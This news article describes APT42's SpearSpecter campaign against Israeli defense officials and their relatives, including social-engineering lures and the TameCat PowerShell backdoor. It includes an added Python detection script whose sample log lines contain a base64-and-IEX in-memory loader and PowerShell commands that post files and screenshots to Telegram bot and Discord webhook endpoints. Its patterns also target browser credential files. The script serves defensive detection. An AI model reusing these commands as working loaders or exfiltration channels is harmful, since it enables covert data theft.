Iran-linked APT42 targets senior Israeli defense officials and their families

The Iranian state-sponsored hacking group APT42 has expanded an espionage campaign aimed at senior defense and government officials, according to a new report from the Israel National Digital Agency (INDA).

INDA says the group, also tracked as Calanque, CharmingCypress, Educated Manticore, Mint Sandstorm, and UNC788, and linked to the IRGC intelligence apparatus, is now targeting not only high-value senior defense and government officials but also their family members in an attempt to widen the attack surface and increase psychological pressure on primary targets.

The campaign, dubbed “SpearSpecter,” relies on social engineering, with attackers spending days or even weeks building rapport through social media, public databases, and professional networks. INDA notes that the hackers often impersonate colleagues or contacts to lure victims into “exclusive” conferences or strategic meetings, sometimes extending the ruse through multiple WhatsApp conversations to build credibility.

The threat actor adapts its approach based on the value of the target and its operational objectives. For credential harvesting, attackers lure victims to spoofed meeting pages that capture credentials in real time. The group also deploys a sophisticated PowerShell-based backdoor known as TameCat, with modular components for data exfiltration and remote control. Once installed, TameCat establishes command-and-control (C&C) channels over Telegram and Discord, enabling long-term access, system reconnaissance, and the exfiltration of sensitive data. The backdoor selectively grabs high-value information such as documents, browser data, general system information, and screenshots, which is then sent back to the attackers via encrypted channels.

The malware operates as a modular in-memory loader that uses trusted system binaries and temporary artifacts to blend in with normal activity and leave fewer traces. The tool employs various obfuscation techniques to evade detection and make analysis more difficult.
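The two behaviours described above, a PowerShell loader that decodes and executes code in memory and a backdoor that talks to Telegram or Discord, both leave marks in PowerShell script-block logging. The following is an added detection example, written for this page and not taken from the INDA report or from any published TameCat analysis: it scores flattened script-block log entries against indicator groups that mirror the article's description (in-memory execution markers, the public Telegram Bot API and Discord webhook hosts, and screenshot or browser-data collection). The log lines are constructed for illustration and contain placeholder tokens; the pattern names, weights and threshold are the example's own choices.

```python
"""
Added example: score PowerShell script-block log lines for the loader,
C2 and collection behaviours the article attributes to TameCat.
Not code from the article or the INDA report; sample data is constructed.
"""
import re
from dataclasses import dataclass, field

# Public API hosts of the two messaging services named in the article.
# PowerShell reaching these directly is unusual on a managed workstation,
# so a match carries the highest weight.
C2_HOST_PATTERNS = {
    "telegram_bot_api": re.compile(r"api\.telegram\.org/bot", re.IGNORECASE),
    "discord_webhook": re.compile(r"discord(?:app)?\.com/api/webhooks/", re.IGNORECASE),
}

# In-memory execution and obfuscation markers typical of PowerShell loaders.
# Individually noisy, so they are weighted lower than a C2 host match.
LOADER_PATTERNS = {
    "base64_decode": re.compile(r"FromBase64String", re.IGNORECASE),
    "invoke_expression": re.compile(r"\bIEX\b|Invoke-Expression", re.IGNORECASE),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE),
    "reflective_load": re.compile(r"\[Reflection\.Assembly\]::Load", re.IGNORECASE),
}

# Collection behaviours the article lists: screenshots and browser data.
COLLECTION_PATTERNS = {
    "screenshot": re.compile(r"CopyFromScreen|Graphics\]::FromImage", re.IGNORECASE),
    "browser_data": re.compile(r"Login Data|Cookies|\\User Data\\", re.IGNORECASE),
}

@dataclass
class Finding:
    line_no: int
    score: int
    indicators: list = field(default_factory=list)

def score_script_block(text):
    """Return (score, matched indicator names) for one script-block text."""
    score, hits = 0, []
    for name, pat in C2_HOST_PATTERNS.items():
        if pat.search(text):
            score += 5
            hits.append(name)
    for group in (LOADER_PATTERNS, COLLECTION_PATTERNS):
        for name, pat in group.items():
            if pat.search(text):
                score += 2
                hits.append(name)
    return score, hits

def scan_log(lines, threshold=4):
    """Return Findings for every line whose score reaches the threshold.
    With the default weights, one C2 host match or two loader/collection
    markers together are enough to surface a line for review."""
    findings = []
    for n, line in enumerate(lines, 1):
        score, hits = score_script_block(line)
        if score >= threshold:
            findings.append(Finding(n, score, hits))
    return findings

# Constructed sample log lines (not real telemetry). The format mimics the
# ScriptBlockText field of a PowerShell 4104 event flattened to one line.
SAMPLE_LOG = [
    "4104 ScriptBlockText: Get-ChildItem C:\\Users\\alice\\Documents -Recurse | Measure-Object",
    "4104 ScriptBlockText: $b=[Convert]::FromBase64String($p); IEX ([Text.Encoding]::UTF8.GetString($b))",
    "4104 ScriptBlockText: Invoke-RestMethod -Uri 'https://api.telegram.org/bot<TOKEN_PLACEHOLDER>/sendDocument' -Method Post -Form $f",
    "4104 ScriptBlockText: [Drawing.Graphics]::FromImage($bmp).CopyFromScreen(0,0,0,0,$bmp.Size); Invoke-WebRequest -Uri 'https://discord.com/api/webhooks/<ID_PLACEHOLDER>' -Method Post",
    "4104 ScriptBlockText: Import-Module ActiveDirectory; Get-ADUser -Filter * | Select Name",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: score {f.score} {f.indicators}")
```

Lines 1 and 5 of the sample are ordinary administration and score zero; line 2 is flagged on the loader markers alone, and lines 3 and 4 are flagged because PowerShell is posting data to a Telegram bot endpoint or a Discord webhook. In production this logic belongs in a SIEM rule over 4104 events, with the host patterns joined to network telemetry so that the same Telegram and Discord destinations can be alerted on even when script-block logging is disabled.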

“The operators leverage a multifaceted infrastructure that combines legitimate cloud services with attacker-controlled resources, enabling seamless initial access, persistent command-and-control (C2), and covert data exfiltration,” INDA says. “Notably, Google / Mandiant documents APT42 operating multiple infrastructure clusters in parallel and abusing Google Sites to funnel victims to fake logins, alongside NICECURL and TAMECAT malware-based operations, patterns we also observe in SpearSpecter. Each cluster employs different infrastructure sets (e.g., distinct lure domains/CDNs, separate delivery hosts, varied C2 fronting) yet shares the same tooling and objectives of credential theft, data theft, and long-term espionage. In practice, this explains minor infrastructure divergences across incidents without weakening the attribution: the clusters differ in infrastructure, not in mission or tradecraft.”
